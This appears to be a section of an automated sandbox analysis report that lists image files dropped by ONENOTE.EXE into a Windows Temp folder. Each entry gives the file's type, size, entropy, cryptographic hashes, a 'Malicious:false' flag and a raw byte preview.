                                                                                                                                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{4C6E989A-BB51-4768-AB54-196E54195ECC}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{4CEBC810-2055-41A8-9598-714D71477D95}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4081
                                                                                                                                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{4D11CBD7-F53D-4F79-BC85-6BE56E62316E}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 50 x 600, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4410
                                                                                                                                                                                                                  Entropy (8bit):7.857636973514526
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:E/pQuIhKZ7u06dICH3AroiTe8DGTl55poBUmLNjpH7MvDHjfm:MpdZtPbknnRPpkLNVMvu
                                                                                                                                                                                                                  MD5:2494381A1ACDC83843B912CFCDE5643B
                                                                                                                                                                                                                  SHA1:98F9D1CC140076D1AE5A9EA19F47658FD5DF0D66
                                                                                                                                                                                                                  SHA-256:5EEBE803E434A845D19BC600DF3C75E98BB69BD0DE473CEEC410D1B3A9154E28
                                                                                                                                                                                                                  SHA-512:0E64CC3723DC41D94910F7ADFB6A0DFB5049350FD15A873695614E4A89ABD78B166BA4E9C8CB95E275FB56981539DECD2A7F28FBC25E80DD5E2DEA8077CC9489
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...2...X.......E.....PLTE...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................B..(....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.].\TU.?3"...(..L........q.Q...H.*j......W..Xd.ie.f..%.XT...em..m.m.vkik...>.}..}|..{'.U..~......}....s.............,CVu.x.:C..5...;.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{4DDEBE29-AE1D-4F72-9122-33C1807BF2D2}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 357x69, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5465
                                                                                                                                                                                                                  Entropy (8bit):7.79401348966645
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:X0cZneDWlIKmXwxacOHHI6EhzNlSSDDgafbofgt7mGrw:XleDWlIJwQHihRdgu8imGk
                                                                                                                                                                                                                  MD5:8470F9A96B6C6CAD9EE60961E96D19B2
                                                                                                                                                                                                                  SHA1:AFE1F01FFA4E4CB06B1D770C9C59DA75B434D1AC
                                                                                                                                                                                                                  SHA-256:2DF453410796AEC7B9EFEC00059B6CE64BCF67313A95AE458BA600EA5DE14811
                                                                                                                                                                                                                  SHA-512:CAE5C2ED091BA49761F0348516D53491E578FB165F32F93AC7DAD927383E9A398B06229FAC6A8233777DF708E5001AE0037A1FA960293BDA49892C40B37F2240
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H.....C....................................................................C.......................................................................E.e.............................................8...............................!"1...2A#Qa.$34bBDSqt..........................................................?.....`0.....O...3Sd..@..5.0....Q.pw....;....!pN.DR....`0......N^...k.=.u.e.7{.b........?z....zV...M.....P:a.SPj.....WRK.=x.2.h..2..AS..s..A..|.Z/f$D.YX1pr......}G6._.~..)j...+.s.r".{..q..-.^@...#w|.H..*.K)....g...y..`0......2.w@.Ro.d....@...K....}...&... y..f.y.0.|DC..>p.[E.2......v..N.)Z..4.RF.D.8]..Z.|f/..+\ID.r/.o........0i..*.G.O..uj..RN. ....j...xnF...Q.Ls.U.c.D0m....z.k.P;f...b.=..L.hH.,./;.U..`sa.I...?*...I....M.0<.u....!..C..U.T.....s.Q......_..7K..*.....?....R\&=.<.u..oQ}WZ..Yu...{Fe3.h...@.s..mW.G..^....1.W.#[.q2.&u.c.G......`J./..X.C....M;.....3k$}.i.3...#/x.m.Oh.}FH]. ..5NNDIS.-.M~...6..w.d....P.;..k...........v*..T..L.P...s.!B.4..w

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{4E03FE1B-6E98-4F27-9C67-730D56D2785C}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19235
                                                                                                                                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{4EA246DC-CA35-4799-918B-97D54F58DAEA}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4847
                                                                                                                                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{4F328AD6-54AB-4D9D-98AE-0B38F9FFCA0C}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2232
                                                                                                                                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{4F51E40E-1456-43AA-BBC5-67AA53EDA094}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):68633
                                                                                                                                                                                                                  Entropy (8bit):7.709776384921022
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
                                                                                                                                                                                                                  MD5:41241EE59AB7BC9EB34784E3BCE31CB4
                                                                                                                                                                                                                  SHA1:98680761A51E9199CF3C89F68B5309FBEC7EE3CB
                                                                                                                                                                                                                  SHA-256:035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
                                                                                                                                                                                                                  SHA-512:3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{4F590CF0-E638-4A89-BDA4-10D16AAB2B93}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13241
                                                                                                                                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{520E04EE-7ABF-4189-92F0-616CBCF5B26F}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4081
                                                                                                                                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{53063CD3-5040-43C9-BD1B-7174EAC983B8}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 3005 x 184, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):12180
                                                                                                                                                                                                                  Entropy (8bit):5.318266117301791
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:k1bHyG/fKOOOOQJUg+g2S+kEm6alfsfsfn32:+bSG/yOOOOQ+g+gOab32
                                                                                                                                                                                                                  MD5:5C859FF69B3A271A9AAB08DFA21E8894
                                                                                                                                                                                                                  SHA1:3156302A7450ADFF4D1B6EC893E955D3764D4DD4
                                                                                                                                                                                                                  SHA-256:B4A8E9A67EE0B897615AC4CCE388FFC175AB92D9E192E6875C79A4E7C1B5BB6E
                                                                                                                                                                                                                  SHA-512:4CF518136EEBCA4F400A115D9B7BB0CAC9FA650BF910B99E15F04A259B7D3EFCFFD6796886FE09DB08C37C332B14BC8500845C09C8EAE1F2306F90E98D3C99E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR..............;j.....sRGB.........pHYs..........+..../9IDATx^...dW...S=.dL$.............-.`...'...x.7.D...(...$.?cO....9S]=.v...Z.......{..wNuf.&.....a.k5~...._..\.yk..v.....}{._.Q...5...._9o.n.....}7.].1v..t......q....3.<..0<.p.......0....s...... @....... @....... @....... @....... @...X.'..U-..... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%@....... @....... @....... @....... @....... @....../)m.. @....... @....... @....... @....... @....... @ ....`.)....... @....... @....... @....... @....... @....K.0.....J....... @....... @....... @....... @....... @...`.....\.... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{531F32E7-2864-4063-92DB-AAE568103C7D}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 69x630, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11040
                                                                                                                                                                                                                  Entropy (8bit):7.929583162638891
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:u99+91V42ho91V42ho91V42ho91V4235z9pUkDCyixxo4PS6b8tEy3BcWWhhSy0b:ubKD4/D4/D4/D4uzX38u4PNYJ2zhhmb
                                                                                                                                                                                                                  MD5:02775A1E41CF53AC771D820003903913
                                                                                                                                                                                                                  SHA1:2951A94A05ECF65E86D44C3C663B9B44BAD2BC9D
                                                                                                                                                                                                                  SHA-256:83245F217DEAE4A4143B565E13C045DBB32A9063E8C6B2E43BB15CD76C5F9219
                                                                                                                                                                                                                  SHA-512:5A1FCC24BDD5EE16BC2C9BACF45BCECF35ED895EAC22D2C4EE99C1B7E79C8E8B9E5186E3D026BA08FF70E08113F0A88FBF5E61C57AF4F3EA9BA80CE9F33410E9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H.....C....................................................................C.......................................................................v.E.............................................S..........................Aa..!12Qqw.....3568rv........".....4Btu.....#Rs.(W..bg.................................D.....................1..2.!4Aqrs....Qa......t..."3BRb....#.$S.Cc..............?...K/h._+.N6.-.a...5...;.r....,...0B.s(..zp..4.%r|q..E.Q^.../...C.R..?u.q8XN.>.e..:..gJ...._.n>.70G,..(........3b.&.5m...Q../...7Ie..k....e.l6..&..`Gt.P.Y^r...=..Y.e...N.B...O.#..J+........u.V;G.'.....V.]8..C.]..........E.....c..w&lX..f..\T.J?...F.,..m|..93........,.....+.R..WG...%.....(@.....p].iEz<.8.^...J.h.....a8P.1......(z..y~.........H.Z^.>..<.....L.k..IG...R.(.%..m....&u...B|.....@]ey.W.J...!d..R.8...[..>8....(.G......!.)X.....,'..F2.Z.t..Aw./..Z..#..i.kK.......b.i...qR.(....RE.............O.XP.#..(...9J..]...,.2.[w....KrW'...tY.......{~.:.+..

